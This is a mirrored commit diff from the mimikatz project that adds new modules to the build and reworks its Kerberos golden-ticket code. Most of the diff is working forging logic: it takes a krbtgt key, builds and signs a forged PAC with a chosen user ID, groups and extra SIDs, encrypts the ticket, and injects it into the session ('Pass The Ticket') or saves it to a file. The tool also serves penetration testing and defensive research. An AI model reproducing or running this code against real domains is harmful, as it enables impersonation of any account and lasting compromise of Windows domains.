mirror of
https://github.com/gentilkiwi/mimikatz
synced 2025-04-01 23:08:07 +00:00
[fix] don't ask me why, but fixing previous SVN commit
This commit is contained in:
Benjamin DELPY
parent
2f66115ccd
commit
a0f243b335
mimikatz.sln
mimikatz
mimilib
mimilove
modules
@ -16,6 +16,7 @@ Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "inc", "inc", "{282B4B77-BFF
|
||||
inc\DbgHelp.h = inc\DbgHelp.h
|
||||
inc\DhcpSSdk.h = inc\DhcpSSdk.h
|
||||
inc\DsGetDC.h = inc\DsGetDC.h
|
||||
inc\Fci.h = inc\Fci.h
|
||||
inc\fltUser.h = inc\fltUser.h
|
||||
inc\fltUserStructures.h = inc\fltUserStructures.h
|
||||
inc\globals.h = inc\globals.h
|
||||
|
||||
@ -29,6 +29,7 @@ const KUHL_M * mimikatz_modules[] = {
|
||||
&kuhl_m_sid,
|
||||
&kuhl_m_iis,
|
||||
&kuhl_m_rpc,
|
||||
&kuhl_m_sr98,
|
||||
};
|
||||
|
||||
int wmain(int argc, wchar_t * argv[])
|
||||
|
||||
@ -30,6 +30,7 @@
|
||||
#include "modules/kuhl_m_sid.h"
|
||||
#include "modules/kuhl_m_iis.h"
|
||||
#include "modules/kuhl_m_rpc.h"
|
||||
#include "modules/kuhl_m_sr98.h"
|
||||
|
||||
#include <io.h>
|
||||
#include <fcntl.h>
|
||||
|
||||
@ -21,7 +21,7 @@ BLOCK "StringFileInfo"
|
||||
VALUE "FileDescription", "mimikatz for Windows"
|
||||
VALUE "FileVersion", "2.1.1.0"
|
||||
VALUE "InternalName", "mimikatz"
|
||||
VALUE "LegalCopyright", "Copyright (c) 2007 - 2017 gentilkiwi (Benjamin DELPY)"
|
||||
VALUE "LegalCopyright", "Copyright (c) 2007 - 2018 gentilkiwi (Benjamin DELPY)"
|
||||
VALUE "OriginalFilename", "mimikatz.exe"
|
||||
VALUE "PrivateBuild", "Build with love for POC only"
|
||||
VALUE "SpecialBuild", "kiwi flavor !"
|
||||
|
||||
@ -141,6 +141,7 @@
|
||||
<ClCompile Include="mimikatz.c" />
|
||||
<ClCompile Include="modules\crypto\kuhl_m_crypto_extractor.c" />
|
||||
<ClCompile Include="modules\crypto\kuhl_m_crypto_patch.c" />
|
||||
<ClCompile Include="modules\crypto\kuhl_m_crypto_sc.c" />
|
||||
<ClCompile Include="modules\dpapi\kuhl_m_dpapi.c" />
|
||||
<ClCompile Include="modules\dpapi\kuhl_m_dpapi_oe.c" />
|
||||
<ClCompile Include="modules\dpapi\packages\kuhl_m_dpapi_chrome.c" />
|
||||
@ -163,6 +164,7 @@
|
||||
<ClCompile Include="modules\kuhl_m_net.c" />
|
||||
<ClCompile Include="modules\kuhl_m_privilege.c" />
|
||||
<ClCompile Include="modules\kuhl_m_process.c" />
|
||||
<ClCompile Include="modules\kuhl_m_sr98.c" />
|
||||
<ClCompile Include="modules\kuhl_m_rpc.c" />
|
||||
<ClCompile Include="modules\kuhl_m_service.c" />
|
||||
<ClCompile Include="modules\kuhl_m_service_remote.c" />
|
||||
@ -230,6 +232,7 @@
|
||||
<ClInclude Include="mimikatz.h" />
|
||||
<ClInclude Include="modules\crypto\kuhl_m_crypto_extractor.h" />
|
||||
<ClInclude Include="modules\crypto\kuhl_m_crypto_patch.h" />
|
||||
<ClInclude Include="modules\crypto\kuhl_m_crypto_sc.h" />
|
||||
<ClInclude Include="modules\dpapi\kuhl_m_dpapi.h" />
|
||||
<ClInclude Include="modules\dpapi\kuhl_m_dpapi_oe.h" />
|
||||
<ClInclude Include="modules\dpapi\packages\kuhl_m_dpapi_chrome.h" />
|
||||
@ -253,6 +256,7 @@
|
||||
<ClInclude Include="modules\kuhl_m_net.h" />
|
||||
<ClInclude Include="modules\kuhl_m_privilege.h" />
|
||||
<ClInclude Include="modules\kuhl_m_process.h" />
|
||||
<ClInclude Include="modules\kuhl_m_sr98.h" />
|
||||
<ClInclude Include="modules\kuhl_m_rpc.h" />
|
||||
<ClInclude Include="modules\kuhl_m_service.h" />
|
||||
<ClInclude Include="modules\kuhl_m_service_remote.h" />
|
||||
|
||||
@ -248,6 +248,12 @@
|
||||
<ClCompile Include="modules\crypto\kuhl_m_crypto_patch.c">
|
||||
<Filter>local modules\crypto</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="modules\kuhl_m_sr98.c">
|
||||
<Filter>local modules</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="modules\crypto\kuhl_m_crypto_sc.c">
|
||||
<Filter>local modules\crypto</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="mimikatz.h" />
|
||||
@ -515,6 +521,12 @@
|
||||
<ClInclude Include="modules\crypto\kuhl_m_crypto_patch.h">
|
||||
<Filter>local modules\crypto</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="modules\kuhl_m_sr98.h">
|
||||
<Filter>local modules</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="modules\crypto\kuhl_m_crypto_sc.h">
|
||||
<Filter>local modules\crypto</Filter>
|
||||
</ClInclude>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<Filter Include="local modules">
|
||||
|
||||
@ -65,8 +65,7 @@ NTSTATUS kuhl_m_kerberos_ptt(int argc, wchar_t * argv[])
|
||||
kprintf(L"* Directory: \'%s\'\n", argv[i]);
|
||||
kull_m_file_Find(argv[i], L"*.kirbi", FALSE, 0, FALSE, kuhl_m_kerberos_ptt_directory, NULL);
|
||||
}
|
||||
else
|
||||
kuhl_m_kerberos_ptt_directory(0, argv[i], PathFindFileName(argv[i]), NULL);
|
||||
else kuhl_m_kerberos_ptt_directory(0, argv[i], PathFindFileName(argv[i]), NULL);
|
||||
}
|
||||
return STATUS_SUCCESS;
|
||||
}
|
||||
@ -78,7 +77,7 @@ BOOL CALLBACK kuhl_m_kerberos_ptt_directory(DWORD level, PCWCHAR fullpath, PCWCH
|
||||
kprintf(L"\n* File: \'%s\': ", fullpath);
|
||||
kuhl_m_kerberos_ptt_file(fullpath);
|
||||
}
|
||||
return TRUE;
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
void kuhl_m_kerberos_ptt_file(PCWCHAR filename)
|
||||
@ -410,10 +409,10 @@ wchar_t * kuhl_m_kerberos_generateFileName_short(PKIWI_KERBEROS_TICKET ticket, L
|
||||
NTSTATUS kuhl_m_kerberos_golden(int argc, wchar_t * argv[])
|
||||
{
|
||||
BYTE key[AES_256_KEY_LENGTH] = {0};
|
||||
DWORD i, j, nbGroups, nbSids = 0, id = 500, keyType = 0, rodc = 0;
|
||||
PCWCHAR szUser, szDomain, szService = NULL, szTarget = NULL, szSid, szKey = NULL, szId, szGroups, szSids, szRodc, szLifetime, szClaims, /*base,*/ filename;
|
||||
PWCHAR baseDot, netbiosDomain;
|
||||
PISID pSid;
|
||||
DWORD keyType = 0, i, j, id = 500, nbGroups, nbSids = 0, rodc = 0;
|
||||
PCWCHAR szUser, szDomain, szService = NULL, szTarget = NULL, szKey = NULL, szLifetime, szSid, szId, szGroups, szSids, szClaims, szRodc, filename;
|
||||
PWCHAR baseDot, netbiosDomain = NULL;
|
||||
PISID pSid = NULL;
|
||||
PGROUP_MEMBERSHIP groups = NULL;
|
||||
PKERB_SID_AND_ATTRIBUTES sids = NULL;
|
||||
PCLAIMS_SET pClaimsSet = NULL;
|
||||
@ -424,126 +423,107 @@ NTSTATUS kuhl_m_kerberos_golden(int argc, wchar_t * argv[])
|
||||
BOOL isPtt = kull_m_string_args_byName(argc, argv, L"ptt", NULL, NULL);
|
||||
|
||||
kull_m_string_args_byName(argc, argv, L"ticket", &filename, L"ticket." MIMIKATZ_KERBEROS_EXT);
|
||||
|
||||
if(kull_m_string_args_byName(argc, argv, L"admin", &szUser, NULL) || kull_m_string_args_byName(argc, argv, L"user", &szUser, NULL))
|
||||
{
|
||||
if(kull_m_string_args_byName(argc, argv, L"domain", &szDomain, NULL))
|
||||
{
|
||||
if(baseDot = wcschr(szDomain, L'.'))
|
||||
{
|
||||
i = (DWORD) ((PBYTE) baseDot - (PBYTE) szDomain);
|
||||
if(netbiosDomain = (PWCHAR) LocalAlloc(LPTR, i + sizeof(wchar_t)))
|
||||
if(kull_m_string_args_byName(argc, argv, L"des", &szKey, NULL))
|
||||
keyType = KERB_ETYPE_DES_CBC_MD5;
|
||||
else if(kull_m_string_args_byName(argc, argv, L"rc4", &szKey, NULL) || kull_m_string_args_byName(argc, argv, L"krbtgt", &szKey, NULL))
|
||||
keyType = KERB_ETYPE_RC4_HMAC_NT;
|
||||
else if(kull_m_string_args_byName(argc, argv, L"aes128", &szKey, NULL))
|
||||
keyType = KERB_ETYPE_AES128_CTS_HMAC_SHA1_96;
|
||||
else if(kull_m_string_args_byName(argc, argv, L"aes256", &szKey, NULL))
|
||||
keyType = KERB_ETYPE_AES256_CTS_HMAC_SHA1_96;
|
||||
|
||||
if(szKey)
|
||||
{
|
||||
for(j = 0; j < i / sizeof(wchar_t); j++)
|
||||
netbiosDomain[j] = towupper(szDomain[j]);
|
||||
kull_m_string_args_byName(argc, argv, L"service", &szService, NULL);
|
||||
kull_m_string_args_byName(argc, argv, L"target", &szTarget, NULL);
|
||||
|
||||
if(kull_m_string_args_byName(argc, argv, L"sid", &szSid, NULL))
|
||||
status = CDLocateCSystem(keyType, &pCSystem);
|
||||
if(NT_SUCCESS(status))
|
||||
{
|
||||
if(ConvertStringSidToSid(szSid, (PSID *) &pSid))
|
||||
if(kull_m_string_stringToHex(szKey, key, pCSystem->KeySize))
|
||||
{
|
||||
if(kull_m_string_args_byName(argc, argv, L"des", &szKey, NULL))
|
||||
keyType = KERB_ETYPE_DES_CBC_MD5;
|
||||
else if(kull_m_string_args_byName(argc, argv, L"rc4", &szKey, NULL) || kull_m_string_args_byName(argc, argv, L"krbtgt", &szKey, NULL))
|
||||
keyType = KERB_ETYPE_RC4_HMAC_NT;
|
||||
else if(kull_m_string_args_byName(argc, argv, L"aes128", &szKey, NULL))
|
||||
keyType = KERB_ETYPE_AES128_CTS_HMAC_SHA1_96;
|
||||
else if(kull_m_string_args_byName(argc, argv, L"aes256", &szKey, NULL))
|
||||
keyType = KERB_ETYPE_AES256_CTS_HMAC_SHA1_96;
|
||||
|
||||
if(szKey)
|
||||
kull_m_string_args_byName(argc, argv, L"startoffset", &szLifetime, L"0");
|
||||
GetSystemTimeAsFileTime(&lifeTimeData.TicketStart);
|
||||
*(PULONGLONG) &lifeTimeData.TicketStart -= *(PULONGLONG) &lifeTimeData.TicketStart % 10000000 - ((LONGLONG) wcstol(szLifetime, NULL, 0) * 10000000 * 60);
|
||||
lifeTimeData.TicketRenew = lifeTimeData.TicketEnd = lifeTimeData.TicketStart;
|
||||
kull_m_string_args_byName(argc, argv, L"endin", &szLifetime, L"5256000"); // ~ 10 years
|
||||
*(PULONGLONG) &lifeTimeData.TicketEnd += (ULONGLONG) 10000000 * 60 * wcstoul(szLifetime, NULL, 0);
|
||||
kull_m_string_args_byName(argc, argv, L"renewmax", &szLifetime, szLifetime);
|
||||
*(PULONGLONG) &lifeTimeData.TicketRenew += (ULONGLONG) 10000000 * 60 * wcstoul(szLifetime, NULL, 0);
|
||||
kprintf(L"User : %s\nDomain : %s", szUser, szDomain);
|
||||
if(kull_m_string_args_byName(argc, argv, L"sid", &szSid, NULL))
|
||||
{
|
||||
kull_m_string_args_byName(argc, argv, L"service", &szService, NULL);
|
||||
kull_m_string_args_byName(argc, argv, L"target", &szTarget, NULL);
|
||||
|
||||
if(kull_m_string_args_byName(argc, argv, L"id", &szId, NULL))
|
||||
id = wcstoul(szId, NULL, 0);
|
||||
if(kull_m_string_args_byName(argc, argv, L"rodc", &szRodc, NULL))
|
||||
rodc = wcstoul(szRodc, NULL, 0);
|
||||
kull_m_string_args_byName(argc, argv, L"groups", &szGroups, NULL);
|
||||
kuhl_m_pac_stringToGroups(szGroups, &groups, &nbGroups);
|
||||
if(kull_m_string_args_byName(argc, argv, L"sids", &szSids, NULL))
|
||||
kuhl_m_pac_stringToSids(szSids, &sids, &nbSids);
|
||||
if(kull_m_string_args_byName(argc, argv, L"claims", &szClaims, NULL))
|
||||
pClaimsSet = kuhl_m_kerberos_claims_createFromString(szClaims);
|
||||
|
||||
status = CDLocateCSystem(keyType, &pCSystem);
|
||||
if(NT_SUCCESS(status))
|
||||
if(ConvertStringSidToSid(szSid, (PSID *) &pSid))
|
||||
{
|
||||
if(kull_m_string_stringToHex(szKey, key, pCSystem->KeySize))
|
||||
i = (DWORD) ((PBYTE) baseDot - (PBYTE) szDomain);
|
||||
if(netbiosDomain = (PWCHAR) LocalAlloc(LPTR, i + sizeof(wchar_t)))
|
||||
for(j = 0; j < i / sizeof(wchar_t); j++)
|
||||
netbiosDomain[j] = towupper(szDomain[j]);
|
||||
if(kull_m_string_args_byName(argc, argv, L"id", &szId, NULL))
|
||||
id = wcstoul(szId, NULL, 0);
|
||||
kull_m_string_args_byName(argc, argv, L"groups", &szGroups, NULL);
|
||||
kuhl_m_pac_stringToGroups(szGroups, &groups, &nbGroups);
|
||||
if(kull_m_string_args_byName(argc, argv, L"sids", &szSids, NULL))
|
||||
kuhl_m_pac_stringToSids(szSids, &sids, &nbSids);
|
||||
if(kull_m_string_args_byName(argc, argv, L"claims", &szClaims, NULL))
|
||||
pClaimsSet = kuhl_m_kerberos_claims_createFromString(szClaims);
|
||||
if(kull_m_string_args_byName(argc, argv, L"rodc", &szRodc, NULL))
|
||||
rodc = wcstoul(szRodc, NULL, 0);
|
||||
kprintf(L" (%s)\nSID : %s\nUser Id : %u\nGroups Id : *", netbiosDomain, szSid, id);
|
||||
for(i = 0; i < nbGroups; i++)
|
||||
kprintf(L"%u ", groups[i].RelativeId);
|
||||
if(nbSids)
|
||||
{
|
||||
kull_m_string_args_byName(argc, argv, L"startoffset", &szLifetime, L"0");
|
||||
GetSystemTimeAsFileTime(&lifeTimeData.TicketStart);
|
||||
*(PULONGLONG) &lifeTimeData.TicketStart -= *(PULONGLONG) &lifeTimeData.TicketStart % 10000000 - ((LONGLONG) wcstol(szLifetime, NULL, 0) * 10000000 * 60);
|
||||
lifeTimeData.TicketRenew = lifeTimeData.TicketEnd = lifeTimeData.TicketStart;
|
||||
kull_m_string_args_byName(argc, argv, L"endin", &szLifetime, L"5256000"); // ~ 10 years
|
||||
*(PULONGLONG) &lifeTimeData.TicketEnd += (ULONGLONG) 10000000 * 60 * wcstoul(szLifetime, NULL, 0);
|
||||
kull_m_string_args_byName(argc, argv, L"renewmax", &szLifetime, szLifetime);
|
||||
*(PULONGLONG) &lifeTimeData.TicketRenew += (ULONGLONG) 10000000 * 60 * wcstoul(szLifetime, NULL, 0);
|
||||
|
||||
kprintf(
|
||||
L"User : %s\n"
|
||||
L"Domain : %s (%s)\n"
|
||||
L"SID : %s\n"
|
||||
L"User Id : %u\n", szUser, szDomain, netbiosDomain, szSid, id);
|
||||
kprintf(L"Groups Id : *");
|
||||
for(i = 0; i < nbGroups; i++)
|
||||
kprintf(L"%u ", groups[i].RelativeId);
|
||||
if(nbSids)
|
||||
kprintf(L"\nExtra SIDs: ");
|
||||
for(i = 0; i < nbSids; i++)
|
||||
{
|
||||
kprintf(L"\nExtra SIDs: ");
|
||||
for(i = 0; i < nbSids; i++)
|
||||
{
|
||||
kull_m_string_displaySID(sids[i].Sid);
|
||||
kprintf(L" ; ");
|
||||
}
|
||||
kull_m_string_displaySID(sids[i].Sid);
|
||||
kprintf(L" ; ");
|
||||
}
|
||||
if(pClaimsSet)
|
||||
{
|
||||
kprintf(L"\nClaims :\n");
|
||||
kuhl_m_kerberos_claims_displayClaimsSet(pClaimsSet);
|
||||
}
|
||||
kprintf(L"\nServiceKey: ");
|
||||
kull_m_string_wprintf_hex(key, pCSystem->KeySize, 0); kprintf(L" - %s\n", kuhl_m_kerberos_ticket_etype(keyType));
|
||||
if(szService)
|
||||
kprintf(L"Service : %s\n", szService);
|
||||
if(szTarget)
|
||||
kprintf(L"Target : %s\n", szTarget);
|
||||
kprintf(L"Lifetime : ");
|
||||
kull_m_string_displayLocalFileTime(&lifeTimeData.TicketStart); kprintf(L" ; ");
|
||||
kull_m_string_displayLocalFileTime(&lifeTimeData.TicketEnd); kprintf(L" ; ");
|
||||
kull_m_string_displayLocalFileTime(&lifeTimeData.TicketRenew); kprintf(L"\n");
|
||||
|
||||
kprintf(L"-> Ticket : %s\n\n", isPtt ? L"** Pass The Ticket **" : filename);
|
||||
|
||||
if(BerApp_KrbCred = kuhl_m_kerberos_golden_data(szUser, szDomain, netbiosDomain, szService, szTarget, &lifeTimeData, pSid, key, pCSystem->KeySize, keyType, id, groups, nbGroups, sids, nbSids, rodc, pClaimsSet))
|
||||
{
|
||||
if(isPtt)
|
||||
{
|
||||
if(NT_SUCCESS(kuhl_m_kerberos_ptt_data(BerApp_KrbCred->bv_val, BerApp_KrbCred->bv_len)))
|
||||
kprintf(L"\nGolden ticket for '%s @ %s' successfully submitted for current session\n", szUser, szDomain);
|
||||
}
|
||||
else if(kull_m_file_writeData(filename, BerApp_KrbCred->bv_val, BerApp_KrbCred->bv_len))
|
||||
kprintf(L"\nFinal Ticket Saved to file !\n");
|
||||
else PRINT_ERROR_AUTO(L"\nkull_m_file_writeData");
|
||||
|
||||
ber_bvfree(BerApp_KrbCred);
|
||||
}
|
||||
else PRINT_ERROR(L"BerApp_KrbCred error\n");
|
||||
}
|
||||
else PRINT_ERROR(L"Krbtgt key size length must be %u (%u bytes) for %s\n", pCSystem->KeySize * 2, pCSystem->KeySize, kuhl_m_kerberos_ticket_etype(keyType));
|
||||
if(pClaimsSet)
|
||||
{
|
||||
kprintf(L"\nClaims :\n");
|
||||
kuhl_m_kerberos_claims_displayClaimsSet(pClaimsSet);
|
||||
}
|
||||
}
|
||||
else PRINT_ERROR(L"Unable to locate CryptoSystem for ETYPE %u (error 0x%08x) - AES only available on NT6\n", keyType, status);
|
||||
}
|
||||
else PRINT_ERROR(L"Missing krbtgt key argument (/rc4 or /aes128 or /aes256)\n");
|
||||
|
||||
LocalFree(pSid);
|
||||
kprintf(L"\nServiceKey: ");
|
||||
kull_m_string_wprintf_hex(key, pCSystem->KeySize, 0); kprintf(L" - %s\n", kuhl_m_kerberos_ticket_etype(keyType));
|
||||
if(szService)
|
||||
kprintf(L"Service : %s\n", szService);
|
||||
if(szTarget)
|
||||
kprintf(L"Target : %s\n", szTarget);
|
||||
kprintf(L"Lifetime : ");
|
||||
kull_m_string_displayLocalFileTime(&lifeTimeData.TicketStart); kprintf(L" ; ");
|
||||
kull_m_string_displayLocalFileTime(&lifeTimeData.TicketEnd); kprintf(L" ; ");
|
||||
kull_m_string_displayLocalFileTime(&lifeTimeData.TicketRenew); kprintf(L"\n");
|
||||
kprintf(L"-> Ticket : %s\n\n", isPtt ? L"** Pass The Ticket **" : filename);
|
||||
if(BerApp_KrbCred = kuhl_m_kerberos_golden_data(szUser, szDomain, szService, szTarget, &lifeTimeData, key, pCSystem->KeySize, keyType, pSid, netbiosDomain, id, groups, nbGroups, sids, nbSids, rodc, pClaimsSet))
|
||||
{
|
||||
if(isPtt)
|
||||
{
|
||||
if(NT_SUCCESS(kuhl_m_kerberos_ptt_data(BerApp_KrbCred->bv_val, BerApp_KrbCred->bv_len)))
|
||||
kprintf(L"\nGolden ticket for '%s @ %s' successfully submitted for current session\n", szUser, szDomain);
|
||||
}
|
||||
else if(kull_m_file_writeData(filename, BerApp_KrbCred->bv_val, BerApp_KrbCred->bv_len))
|
||||
kprintf(L"\nFinal Ticket Saved to file !\n");
|
||||
else PRINT_ERROR_AUTO(L"\nkull_m_file_writeData");
|
||||
ber_bvfree(BerApp_KrbCred);
|
||||
}
|
||||
else PRINT_ERROR(L"BerApp_KrbCred error\n");
|
||||
}
|
||||
else PRINT_ERROR_AUTO(L"SID seems invalid - ConvertStringSidToSid");
|
||||
else PRINT_ERROR(L"Krbtgt key size length must be %u (%u bytes) for %s\n", pCSystem->KeySize * 2, pCSystem->KeySize, kuhl_m_kerberos_ticket_etype(keyType));
|
||||
}
|
||||
else PRINT_ERROR(L"Missing SID argument\n");
|
||||
|
||||
LocalFree(netbiosDomain);
|
||||
else PRINT_ERROR(L"Unable to locate CryptoSystem for ETYPE %u (error 0x%08x) - AES only available on NT6\n", keyType, status);
|
||||
}
|
||||
else PRINT_ERROR(L"Missing krbtgt key argument (/rc4 or /aes128 or /aes256)\n");
|
||||
}
|
||||
else PRINT_ERROR(L"Domain name does not look like a FQDN\n");
|
||||
}
|
||||
@ -551,6 +531,10 @@ NTSTATUS kuhl_m_kerberos_golden(int argc, wchar_t * argv[])
|
||||
}
|
||||
else PRINT_ERROR(L"Missing user argument\n");
|
||||
|
||||
if(pSid)
|
||||
LocalFree(pSid);
|
||||
if(netbiosDomain)
|
||||
LocalFree(netbiosDomain);
|
||||
if(groups && nbGroups)
|
||||
LocalFree(groups);
|
||||
if(sids && nbSids)
|
||||
@ -561,7 +545,6 @@ NTSTATUS kuhl_m_kerberos_golden(int argc, wchar_t * argv[])
|
||||
}
|
||||
if(pClaimsSet)
|
||||
kuhl_m_kerberos_claims_free(pClaimsSet);
|
||||
|
||||
return STATUS_SUCCESS;
|
||||
}
|
||||
|
||||
@ -597,12 +580,12 @@ NTSTATUS kuhl_m_kerberos_encrypt(ULONG eType, ULONG keyUsage, LPCVOID key, DWORD
|
||||
return status;
|
||||
}
|
||||
|
||||
PBERVAL kuhl_m_kerberos_golden_data(LPCWSTR username, LPCWSTR domainname, LPCWSTR LogonDomainName, LPCWSTR servicename, LPCWSTR targetname, PKUHL_M_KERBEROS_LIFETIME_DATA lifetime, PISID sid, LPCBYTE key, DWORD keySize, DWORD keyType, DWORD userid, PGROUP_MEMBERSHIP groups, DWORD cbGroups, PKERB_SID_AND_ATTRIBUTES sids, DWORD cbSids, DWORD rodc, PCLAIMS_SET pClaimsSet)
|
||||
PBERVAL kuhl_m_kerberos_golden_data(LPCWSTR username, LPCWSTR domainname, LPCWSTR servicename, LPCWSTR targetname, PKUHL_M_KERBEROS_LIFETIME_DATA lifetime, LPCBYTE key, DWORD keySize, DWORD keyType, PISID sid, LPCWSTR LogonDomainName, DWORD userid, PGROUP_MEMBERSHIP groups, DWORD cbGroups, PKERB_SID_AND_ATTRIBUTES sids, DWORD cbSids, DWORD rodc, PCLAIMS_SET pClaimsSet)
|
||||
{
|
||||
NTSTATUS status;
|
||||
NTSTATUS status = STATUS_INVALID_PARAMETER;
|
||||
KIWI_KERBEROS_TICKET ticket = {0};
|
||||
PKERB_VALIDATION_INFO pValidationInfo;
|
||||
PPACTYPE pacType; DWORD pacTypeSize;
|
||||
PKERB_VALIDATION_INFO pValidationInfo = NULL;
|
||||
PPACTYPE pacType = NULL; DWORD pacTypeSize = 0;
|
||||
LONG SignatureType;
|
||||
PBERVAL BerApp_EncTicketPart, BerApp_KrbCred = NULL;
|
||||
|
||||
@ -646,35 +629,43 @@ PBERVAL kuhl_m_kerberos_golden_data(LPCWSTR username, LPCWSTR domainname, LPCWST
|
||||
default:
|
||||
SignatureType = KERB_CHECKSUM_HMAC_MD5;
|
||||
}
|
||||
|
||||
if(pValidationInfo = kuhl_m_pac_infoToValidationInfo(&lifetime->TicketStart, username, domainname, LogonDomainName, sid, userid, groups, cbGroups, sids, cbSids))
|
||||
|
||||
if(sid) // we want a PAC !
|
||||
{
|
||||
if(kuhl_m_pac_validationInfo_to_PAC(pValidationInfo, NULL, NULL, SignatureType, pClaimsSet, &pacType, &pacTypeSize))
|
||||
if(pValidationInfo = kuhl_m_pac_infoToValidationInfo(&lifetime->TicketStart, username, domainname, LogonDomainName, sid, userid, groups, cbGroups, sids, cbSids))
|
||||
{
|
||||
kprintf(L" * PAC generated\n");
|
||||
status = kuhl_m_pac_signature(pacType, pacTypeSize, SignatureType, key, keySize);
|
||||
if(kuhl_m_pac_validationInfo_to_PAC(pValidationInfo, NULL, NULL, SignatureType, pClaimsSet, &pacType, &pacTypeSize))
|
||||
{
|
||||
kprintf(L" * PAC generated\n");
|
||||
status = kuhl_m_pac_signature(pacType, pacTypeSize, SignatureType, key, keySize);
|
||||
if(NT_SUCCESS(status))
|
||||
kprintf(L" * PAC signed\n");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if(!sid || NT_SUCCESS(status))
|
||||
{
|
||||
if(BerApp_EncTicketPart = kuhl_m_kerberos_ticket_createAppEncTicketPart(&ticket, pacType, pacTypeSize))
|
||||
{
|
||||
kprintf(L" * EncTicketPart generated\n");
|
||||
status = kuhl_m_kerberos_encrypt(keyType, KRB_KEY_USAGE_AS_REP_TGS_REP, key, keySize, BerApp_EncTicketPart->bv_val, BerApp_EncTicketPart->bv_len, (LPVOID *) &ticket.Ticket.Value, &ticket.Ticket.Length, TRUE);
|
||||
if(NT_SUCCESS(status))
|
||||
{
|
||||
kprintf(L" * PAC signed\n");
|
||||
if(BerApp_EncTicketPart = kuhl_m_kerberos_ticket_createAppEncTicketPart(&ticket, pacType, pacTypeSize))
|
||||
{
|
||||
kprintf(L" * EncTicketPart generated\n");
|
||||
status = kuhl_m_kerberos_encrypt(keyType, KRB_KEY_USAGE_AS_REP_TGS_REP, key, keySize, BerApp_EncTicketPart->bv_val, BerApp_EncTicketPart->bv_len, (LPVOID *) &ticket.Ticket.Value, &ticket.Ticket.Length, TRUE);
|
||||
if(NT_SUCCESS(status))
|
||||
{
|
||||
kprintf(L" * EncTicketPart encrypted\n");
|
||||
if(BerApp_KrbCred = kuhl_m_kerberos_ticket_createAppKrbCred(&ticket, FALSE))
|
||||
kprintf(L" * KrbCred generated\n");
|
||||
LocalFree(ticket.Ticket.Value);
|
||||
}
|
||||
else PRINT_ERROR(L"kuhl_m_kerberos_encrypt %08x\n", status);
|
||||
ber_bvfree(BerApp_EncTicketPart);
|
||||
}
|
||||
kprintf(L" * EncTicketPart encrypted\n");
|
||||
if(BerApp_KrbCred = kuhl_m_kerberos_ticket_createAppKrbCred(&ticket, FALSE))
|
||||
kprintf(L" * KrbCred generated\n");
|
||||
LocalFree(ticket.Ticket.Value);
|
||||
}
|
||||
LocalFree(pacType);
|
||||
else PRINT_ERROR(L"kuhl_m_kerberos_encrypt %08x\n", status);
|
||||
ber_bvfree(BerApp_EncTicketPart);
|
||||
}
|
||||
LocalFree(pValidationInfo);
|
||||
}
|
||||
|
||||
if(pacType)
|
||||
LocalFree(pacType);
|
||||
if(pValidationInfo)
|
||||
LocalFree(pValidationInfo);
|
||||
if(ticket.Key.Value)
|
||||
LocalFree(ticket.Key.Value);
|
||||
if(ticket.ClientName)
|
||||
|
||||
@ -42,5 +42,5 @@ NTSTATUS kuhl_m_kerberos_test(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_kerberos_hash_data(LONG keyType, PCUNICODE_STRING pString, PCUNICODE_STRING pSalt, DWORD count);
|
||||
wchar_t * kuhl_m_kerberos_generateFileName(const DWORD index, PKERB_TICKET_CACHE_INFO_EX ticket, LPCWSTR ext);
|
||||
wchar_t * kuhl_m_kerberos_generateFileName_short(PKIWI_KERBEROS_TICKET ticket, LPCWSTR ext);
|
||||
PBERVAL kuhl_m_kerberos_golden_data(LPCWSTR username, LPCWSTR domainname, LPCWSTR LogonDomainName, LPCWSTR servicename, LPCWSTR targetname, PKUHL_M_KERBEROS_LIFETIME_DATA lifetime, PISID sid, LPCBYTE key, DWORD keySize, DWORD keyType, DWORD userid, PGROUP_MEMBERSHIP groups, DWORD cbGroups, PKERB_SID_AND_ATTRIBUTES sids, DWORD cbSids, DWORD rodc, PCLAIMS_SET pClaimsSet);
|
||||
PBERVAL kuhl_m_kerberos_golden_data(LPCWSTR username, LPCWSTR domainname, LPCWSTR servicename, LPCWSTR targetname, PKUHL_M_KERBEROS_LIFETIME_DATA lifetime, LPCBYTE key, DWORD keySize, DWORD keyType, PISID sid, LPCWSTR LogonDomainName, DWORD userid, PGROUP_MEMBERSHIP groups, DWORD cbGroups, PKERB_SID_AND_ATTRIBUTES sids, DWORD cbSids, DWORD rodc, PCLAIMS_SET pClaimsSet);
|
||||
NTSTATUS kuhl_m_kerberos_encrypt(ULONG eType, ULONG keyUsage, LPCVOID key, DWORD keySize, LPCVOID data, DWORD dataSize, LPVOID *output, DWORD *outputSize, BOOL encrypt);
|
||||
@ -5,7 +5,7 @@
|
||||
*/
|
||||
#include "kuhl_m_kerberos_ccache.h"
|
||||
|
||||
const UNICODE_STRING usXCACHECONF = {24, 26, L"X-CACHECONF:"};
|
||||
DECLARE_CONST_UNICODE_STRING(usXCACHECONF, L"X-CACHECONF:");
|
||||
NTSTATUS kuhl_m_kerberos_ccache_enum(int argc, wchar_t * argv[], BOOL isInject, BOOL isSave)
|
||||
{
|
||||
PBYTE file, data;
|
||||
|
||||
@ -631,310 +631,6 @@ wchar_t * kuhl_m_crypto_generateFileName(const wchar_t * term0, const wchar_t *
|
||||
return buffer;
|
||||
}
|
||||
|
||||
DWORD kuhl_m_crypto_l_sc_provtypefromname(LPCWSTR szProvider)
|
||||
{
|
||||
DWORD result = 0, provType, tailleRequise, index = 0;
|
||||
wchar_t * monProvider;
|
||||
for(index = 0, result = 0; !result && CryptEnumProviders(index, NULL, 0, &provType, NULL, &tailleRequise); index++)
|
||||
{
|
||||
if(monProvider = (wchar_t *) LocalAlloc(LPTR, tailleRequise))
|
||||
{
|
||||
if(CryptEnumProviders(index, NULL, 0, &provType, monProvider, &tailleRequise))
|
||||
if(_wcsicmp(szProvider, monProvider) == 0)
|
||||
result = provType;
|
||||
LocalFree(monProvider);
|
||||
}
|
||||
}
|
||||
if(!result && GetLastError() != ERROR_NO_MORE_ITEMS)
|
||||
